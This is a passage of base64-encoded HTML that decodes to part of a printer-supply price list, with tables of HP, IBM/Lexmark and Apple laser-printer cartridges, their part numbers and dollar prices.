Mjk4QTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250 IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ0OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxM0E8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT5MYXNlcmpldCBTZXJpZXMgNTAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTI5WDwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQxMjU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+Jm5ic3A7SXRlbSAjMTNCPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFz ZXJqZXQgU2VyaWVzIDEyMDAsIDMzMDANCnNlcmllczwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PkM3MTE1QTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxm b250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAw MDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxM0M8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5MYXNlcmpldCBTZXJpZXMgNDEwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM4MDYx WDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNv bG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ5OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxODwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3Rk Pg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxh c2VyamV0IFNlcmllcyZuYnNwOyAzMTAwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoN Cjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+MzkwNkE8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMzk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+Jm5ic3A7SXRlbSAjMTk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNl cmpldCBTZXJpZXMgNDUwMCBCbGFjazwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTkxJm5i c3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDY5PC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPiZuYnNwO0l0ZW0gIzIwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ TGFzZXJqZXQgU2VyaWVzIDQ1MDAgQ29sb3I8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5DQUxM PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDg5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4NCg0KPGNlbnRlcj48cHJlPjx1Pjxmb250IGZh Y2U9IkFyaWFsLEhlbHZldGljYSI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzM+ Rm9yIEhld2xldHQgUGFja2FuZCBDYW5ub24gRmF4IA0KPGk+KG9uIFBhZ2UgMjxiPik8L2I+PC9p PjwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L3ByZT48L2NlbnRlcj4NCg0KPGNlbnRlcj48dGFi bGUgQk9SREVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTAlIiBCR0NPTE9SPSIjRkZGRkNDIiA+DQo8 dHIgQUxJR049Q0VOVEVSIEJHQ09MT1I9IiM0MDgwODAiPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5JVEVNPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9 KzE+REVTQ1JJUFRJT048L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNl bnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5NRkcgIzwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZG Ij48Zm9udCBzaXplPSsxPlBSSUNFPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3Ry Pg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXpl PSsxPkl0ZW0gIyAxNDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxlc2VyZmF4IDUwMCwgNzAw PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+RlgxPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ JDU5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkl0ZW0gIyAxNTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyZmF4IDUwMDAsIDcwMDA8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMT5GWDI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNl bnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNjQ8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjIDE2PC9mb250PjwvZm9udD48L2NlbnRl cj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+TGFzZXJmYXggNjAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkZYMzwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICMxNzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyZmF4IDg1MDAsIDkw MDA8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5GWDQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT4kNTQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMTg8L2Zv bnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmZheCAzMjAwPC9mb250PjwvZm9udD48L2NlbnRl cj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+MzkwNkE8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNDQ8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCjwvdHI+DQo8L3RhYmxlPjwvY2VudGVyPg0KDQo8Y2VudGVyPg0KPHA+ PHU+PGZvbnQgZmFjZT0iQXJpYWwsSGVsdmV0aWNhIj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMj5Gb3INCkxleG1hcmsgLyBJQk0gTWFjaGluZXM6PGk+IChvbiBQYWdlIDMpPC9p PjwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L2NlbnRlcj4NCg0KPGNlbnRlcj48dGFibGUgQk9S REVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTklIiBCR0NPTE9SPSIjRkZGRkNDIiA+DQo8dHIgQkdD T0xPUj0iIzQwODA4MCI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Yj48 Zm9udCBmYWNlPSJCb29rbWFuIE9sZCBTdHlsZSI+Jm5ic3A7PC9mb250PjwvYj48Zm9udCANCnNp emU9KzE+SVRFTTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsxPkRFU0NSSVBUSU9OPC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZG RkYiPjxmb250IHNpemU9KzE+TUZHICM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0K PHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMxPC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+SUJNIDQwMTkvNDAyOSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXpl PSsxPjEzODAyMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0K PGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kOTU8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMjwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPk9wdHJhIFIsNDAzOSwgNDA0OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPjEzODIx NTA8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTE3PC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPkl0ZW0gIzM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0K PHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5PcHRyYSBF MzEwLCBFMzEyPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+ PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7MTJBMjIwMjwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiQ4OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICM0PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50 ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+T3B0cmEgRTwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPiZuYnNwOzY5RzgyNTYmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT4kNTk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjNTwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk9wdHJhIFM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT4mbmJzcDsxMzgyNjI1Jm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDEzNTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM2PC9mb250PjwvZm9udD48 L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+T3B0cmEgVDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyAxMkE1 ODQwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDE2NTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM3PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoN Cjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+T3B0cmEg RTQxMC80MTI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDsgNEswMDE5OCZuYnNwOzwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQxMTU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQo8L3RhYmxlPjwvY2VudGVyPg0KDQo8Y2VudGVyPg0KPHA+PHU+PGZvbnQgZmFj ZT0iQXJpYWwsSGVsdmV0aWNhIj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMj5G b3INCkFwcGxlIFByaW50ZXJzOjxpPiAob24gUGFnZSA4KTwvaT48L2ZvbnQ+PC9mb250PjwvZm9u dD48L3U+PC9jZW50ZXI+DQoNCjxjZW50ZXI+PHRhYmxlIEJPUkRFUiBXSURUSD0iODAlIiBIRUlH SFQ9IjEwJSIgQkdDT0xPUj0iI0ZGRkZDQyIgPg0KPHRyIEFMSUdOPUxFRlQgQkdDT0xPUj0iIzQw ODA4MCI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsx PklURU08L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9u dCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5ERVNDUklQVElPTjwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48 Zm9udCBzaXplPSsxPk1GRyM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0K PGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9u dCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtJm5ic3A7ICMxPC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+UGVyc29uYWwgTGFzZXJXcml0ZXI8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5NMDA4OUxMQTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1NDwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMyPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+TGFzZXJXcml0ZXIgMzAwUFgvIDMyMC00TCwrNE1MPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+TTIwNDVHQTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1NDwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ TGFzZXJXcml0ZXIgU2VsZWN0IDM2MDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk0xOTYwR0E8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNzQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+SXRlbSAjNDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyV3JpdGVy IDE2LyA2MDAgUHJvJm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TTI0NzNHQTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICM1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFzZXJXcml0ZXIgMTIv IDY0MCBQUzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxm b250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk00NjgzR0EmbmJzcDs8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+ DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+SXRlbSAjNjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyIFdyaXRlciBOVC8yTlQ8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5NNDUzMkdBPC9mb250PjwvZm9udD48L2NlbnRlcj4N 